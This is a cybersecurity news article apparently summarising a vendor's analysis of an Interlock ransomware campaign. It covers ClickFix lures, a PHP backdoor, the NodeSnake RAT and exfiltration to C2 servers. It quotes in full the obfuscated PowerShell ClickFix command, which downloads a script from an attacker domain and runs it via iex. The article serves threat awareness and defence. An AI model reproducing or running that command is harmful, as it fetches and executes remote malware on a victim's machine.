Interlock Ransomware Strikes: eSentire Exposes Multi-Stage Payload and ClickFix Social Engineering

The eSentire Threat Response Unit (TRU) exposed a detailed and technically sophisticated ransomware campaign orchestrated by the notorious Interlock Group, a threat actor operating across North America and Europe since at least September 2024. This latest analysis reveals an elaborate infection chain, multi-stage payloads, obfuscated PHP scripts, and backup C2 infrastructure.

“Despite its name, this tool functions primarily as a backdoor rather than a Remote Access Trojan (RAT), with support for several attacker-supplied commands to allow for further reconnaissance and ransomware deployment,” TRU analysts noted about the so-called Interlock RAT.

The campaign initiates via compromised websites (notably KongTuke), redirecting users through a social engineering lure dubbed ClickFix. Victims are coaxed into executing a PowerShell command embedded with obfuscation:

PowerShell.exe" -w h -nop -c "$gt='dng-m,i,crosoftds,com'.Split(',');$yn='htt'+'ps://'+$gt[0]+$gt[1]+$gt[2]+'.'+$gt[3]+'/' + 'uvA'+'4I'+'BD'+'9'+'.txt';$ws=New-Object Net.WebClient;$sc=$ws.('Download'+'String')($yn);$zl='i'+'ex';&$zl $sc"

This script fingerprints the victim’s system, sends the data to the command-and-control (C2) server, and retrieves a malicious payload that simulates an error window while preparing further deployment.

The next stages involve multiple obfuscated payloads and LOLBins:

• A Windows shortcut (.lnk) points to a launcher binary c2.exe.
• PowerShell executes a PHP interpreter, which loads an obfuscated backdoor called config.cfg.
• The Interlock PHP Backdoor supports commands like “EXE”, “DLL”, “JS”, and “CMD” to download payloads and enable persistence.

“TRU observed Interlock Group using this backdoor to deploy NodeSnake… used to harvest sensitive files for exfiltration.”

The attacker’s toolkit is diverse and includes use of rundll32.exe to execute PNGs acting as DLLs, and leveraging NodeJS to run JavaScript payloads.

Upon verifying that the victim is not in a virtual environment, the attackers deploy NodeSnake RAT, leveraging a full Node.js environment downloaded and installed silently on the victim’s machine.

NodeJS and NodeSnake (node.log) were deployed through PowerShell commands and the archive downloaded from nodejs.org.

Sensitive victim files are base64-encoded and stored in C:\Users\Public for later exfiltration. System data is encrypted with a custom XOR algorithm, compressed using Gzip, and sent to the attacker’s C2 infrastructure.

In addition to primary C2 servers, Interlock maintains a backup mechanism stored in a temp file hiskeow.tmp, decrypted via a custom XOR algorithm seeded with runtime values. The group’s custom backdoor supports reverse shell capabilities, self-deletion, and adaptive command execution.

Interlock Group’s relentless innovation—combining PHP, NodeJS, reverse shells, and obfuscated C2 protocols—demonstrates how ransomware gangs are investing heavily in modular, layered attack architectures.

Related Posts:

• Interlock RAT Gets PHP Makeover: New Variant Uses Steganography & ClickFix for Stealthy Infiltration
• CISA, FBI Warn of Interlock Ransomware, Actively Targeting Businesses & Critical Infrastructure
• Interlock Ransomware Uses Evolving Tactics to Evade Detection
• From Fake Updates to Data Exfiltration: Inside Interlock Ransomware’s Operations
• Interlock Ransomware: New Threat Targets Windows & FreeBSD

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy